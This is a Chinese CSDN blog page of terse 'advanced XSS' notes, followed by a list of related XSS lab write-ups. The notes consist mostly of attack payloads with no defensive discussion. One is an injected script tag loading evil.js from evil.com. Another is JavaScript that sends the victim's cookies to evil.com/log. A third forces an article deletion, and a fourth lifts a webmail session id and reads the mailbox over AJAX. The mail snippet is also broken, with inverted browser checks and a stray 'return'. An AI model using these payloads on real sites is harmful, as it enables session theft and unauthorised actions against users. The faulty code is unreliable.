XSS进阶

最新推荐文章于 2024-07-19 14:10:56 发布
最新推荐文章于 2024-07-19 14:10:56 发布
阅读量34 收藏
点赞数
文章标签: xss ajax javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50362292/article/details/130694565
版权 
http://www.a.com/test.html?abc="><script src=http://www.evil.com/evil.js></script>

窃取Cookie:

var img =document.createElement("img");
img.src="http://www.evil.com/log?"+escape(document.cookie);
document.body.appendChild(img);

执行删除文章:

var img=document.createElement("img");
img.src="http://...../delete$id=1";
document.body.appendChild(img);

XSS Payload mail:

if (top.window.location.href.indexOf("sid=")>0){
var sid= top.window.location.href.substr(top.window.location.href.indexOf("sid=")+4,24);}
var ajax=null;
if(window.XMLHttpRequest){ajax=new ActiveXObject("Microsoft.XMLHTTP");
}
else{
return;
}

ajax.open("GET",folder_url,true);
ajax.send(null);

ajax.onreadystatechange = function() {
if(ajax.readystate==4 && ajax.status==200){
alert(ajax.responseText);
//document.write(ajax.responseText)
}
}

XSS 攻击平台:
BeEF

weixin_50362292
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XSS进阶
ChuMeng1999的博客
11-15 363
打开实验网址(http://10.1.1.11:81),可以看到实验练习系统。了解点php和javascript,下面给出了学习网址。服务器配置:apache+php+Mysql。尝试构造语句使浏览器执行弹出对话框的脚本。尝试构造语句使浏览器执行弹出对话框的脚本。尝试构造语句使浏览器执行弹出对话框的脚本。实例八:有时候你要跳出来你的思维。分析:与实例六一样吗?对本实例过滤方法及绕过进行分析。实例七:和实例六有什么区别?XSS基础、XSS进阶一。实例九:将xss进行到底。浏览器/服务器环境。
XSS进阶之CSP绕过
ChuMeng1999的博客
11-15 660
script-src”限制外部脚本的加载,strict-dynamic特性允许将信任关系传递给由受信任的script动态生成的脚本,忽略了script-src的白名单,使得之后生成的脚本可以执行。CSP中的strict-dynamic特性允许将信任关系传递给动态生成的脚本,可以绕过script-src白名单限制,使得当从客户端插入JS时可以被解释执行。上述POC的作用是使我们注入的代码成为受信任的js脚本,从而绕过CSP的白名单的限制。尝试构造语句使浏览器执行弹出对话框的脚本。3.了解CSP的一些特性。
XSS进阶
Laputa_设计模式&网络&Git&操作系统
04-21 295
实验来源:合天网安实验室预备知识 1、攻击原理:恶意浏览者构造巧妙的脚本恶意代码 通过网站功能存入到网站的数据库里面,如果程序没有经过过滤或者过滤敏感字符不严密就直接输出或者写入数据库,合法用户在访问这些页面的时候 程序将数据库里面的信息输出, 这些恶意代码就会被执行。      2、XSS漏洞的分类      本地利用漏洞,这种漏洞存在于页面中客户端脚本自身;      反射式漏洞,这种漏洞和类...
XSS进阶三 ——合天网安实验室学习笔记
weixin_42582241的博客
04-03 618
实验链接 XSS攻击分成两类,一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。另一类则是来自外部的攻击,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个有跨站漏洞的网页,然后构造跨站语句,通过结合其它技术,如社会工程学等,欺骗目标服务器的管理员打开。 链接:...
XSS进阶小教程
18年3月萌新白帽子
02-25 3938
一、在了解XSS之前,我们首先需要先了解一下HTML 与 JavaScript 自解码机制。 1、HTML的自解码机制 浏览器在解析HTML标签属性值内的代码前,会先对下列两种编码进行解码,然后再对属性中的代码进行解析。 (1)、进制解码:&#xH;(十六进制格式)、&#D;(十进制格式)。编码中最后的分号(;)可以不要。且16进制中用来表示10~15的a~f对大...
XSS进阶
ChuMeng1999的博客
11-15 400
说明:实验二比实验一的难度相对来说是加大了。大牛之路是艰辛的,当你感孤独与寂寞的时候,说明你已经上路了。你其实并不孤独,你走的路,其实都已经很多人走过了。放开了你们的手脚,大胆的去思考,不要被习惯束缚,答案并不唯一。尝试构造语句使浏览器执行弹出对话框的脚本,并完成实验分析六。尝试构造语句使浏览器执行弹出对话框的脚本,并完成实验分析六。尝试构造语句使浏览器执行弹出对话框的脚本,并完成实验分析六。实例五:限制了我的左手,我还有右手呢。实例六:大胆去思考,小心的去求证。实例四:换一个角度,阳光依旧。
xss进阶
ncafei的博客
11-25 597
转自  http://blog.csdn.net/u012763794/article/details/48215585 实验来源:合天网安实验室 实例七、和实例六好像木有区别       关键代码: 分析:htmlentities函数把字符转换为 HTML 实体(具体如下)。 显示结果 描述 实体名称 实体编号   空格   &#
Dom Xss 进阶
Grey的博客
08-08 2512
说到了显式输出和隐式输出。但是不论怎么样,因为最终 javascript 都会通过 document.write 或 innerHTML 将内 容输出到网页中,所以我们总是有办法看到输出到哪里。 但是有时候,我们的输出,最终并没有流向 innerHTML 或 document.write, 而是与 eval 发生了邂逅,我们该怎么挖掘并利用呢? 详细说明 1. 我们直接上例子。 http:...
【合天】XSS进阶
weixin_44452160的博客
02-02 202
最近看了一些类似佛教or玄学or外星人的vlog,虽然对神秘的东方力量及外星文化没法眼见为实地去验证,但其中讲到“引力法则”有一句话我还是挺赞同:如果想要获得某种能力,那就帮助别人去获得这种能力,回过头来发现自己也一定具备了这种能力并且会认识更加深刻;每天给自己积极的心理暗示以及输出正能量给周围的人(据“引力法则”将这样的心态会导致磁场巴拉巴拉变得正能量,从而事事顺心?)…其中的科学原理有待考证,...
XSS攻击进阶篇.zip
09-27
**XSS(跨站脚本)攻击是一种常见的网络安全威胁,主要针对Web应用程序。...了解其原理和防御措施是网络安全中的重要一环,对于开发者和安全研究人员来说,持续学习和掌握XSS攻击的进阶知识至关重要。**
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
米斯特 xss
05-03
米斯特的xss进阶教程~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~·~~
JavaWeb进阶.zip
06-28
10. **安全**:理解基本的安全机制,如CSRF防护、XSS防御、SQL注入防范,以及使用HTTPS等,是保障Web应用安全的基础。 以上知识点只是JavaWeb进阶学习的一部分,实际的"JavaWeb进阶.zip"可能涵盖更多内容,例如...
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如...
CTFshow--web--xss
pwfortune的博客
07-16 1023
先在自己的服务器写上代码要拿到管理员的cookie , 而不是自己的。
web安全之跨站脚本攻击xss
奔跑的小猪仔
07-17 963
xss 跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意js代码,当用户浏览该页之时,嵌入其中web里面的js代码会被执行,从而达到恶意的特殊目的。
CSRF+XSS组合攻击实战
最新发布
记录学习
07-19 1073
xss和csrf组合攻击漏洞复现
DOM型XSS(跨站脚本攻击)的自动化测试和人工测试方法
m0_52484587的博客
07-16 318
它包含预定义的XSS payload集合,并采用多线程处理以提高效率,能够检测反射型、存储型以及DOM型XSS漏洞,并生成详细的报告。:使用如腾讯安全平台部提出的门神DOM-XSS防御JS等方案,通过JavaScript代码实现客户端防护,提高常见DOM XSS攻击的门槛。:通过浏览器的开发者工具,如F12,检查页面的DOM结构,尝试修改DOM元素的属性或内容,观察是否触发XSS。:分析Web页面的JavaScript代码,特别是那些动态生成HTML的部分,以查找可能的XSS漏洞。
XSS防御实战:入门到进阶案例解析
"《那些年我们一起学XSS1》是一篇深入探讨跨站脚本攻击(XSS)的文章,主要内容涵盖了XSS的基本原理、不同环境下的表现形式以及防御策略的绕过技巧。文章首先介绍了XSS的核心概念,指出XSS的存在往往源于输入数据的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值